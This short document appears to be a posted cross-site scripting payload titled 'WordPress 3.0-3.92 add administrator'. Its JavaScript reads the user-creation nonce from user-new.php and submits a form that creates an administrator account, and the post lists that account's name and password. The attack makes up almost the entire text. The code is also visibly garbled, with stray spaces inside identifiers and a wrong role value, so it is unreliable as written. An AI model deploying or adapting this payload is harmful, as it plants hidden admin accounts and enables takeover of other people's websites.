Wordpress3.0-3.92 add administrator Payload
Var a = location. href. split ('/'); var xurl = location. href. replace (a [. length-1], "user-new.php"); jQuery. ajax ({url: xurl, type: 'get', dataType: 'html ', data :{},}). done (function (data) {var temp = jQuery (data); var Xtoken = ""; temp. find ('input # _ wpnonce_create-user '). each (function (I, o) {var o = jQuery (o); Xtoken = o. attr ('value') ;}); jQuery. ajax ({url: xurl, type: 'post', data: {'action': 'createuser', '_ wpnonce_create-user': Xtoken, 'user _ login ': '0x _ jin', 'email ': 'root @ xss1.com', 'First _ name': '0x _ jin', 'last _ name': '0x _ jin ', 'url': 'www .xss1.com ', 'pass1': 'fuckxssq', 'pass2': 'fuckxssq', 'role': 'admin', 'createuser ': 'Add + New + User + '}}). done (function () {console. log ('OK'); return ;})}). fail (function () {console. log ("error ");}). always (function () {return ;});
Account: 0x_Jin
Password: fuckxssQ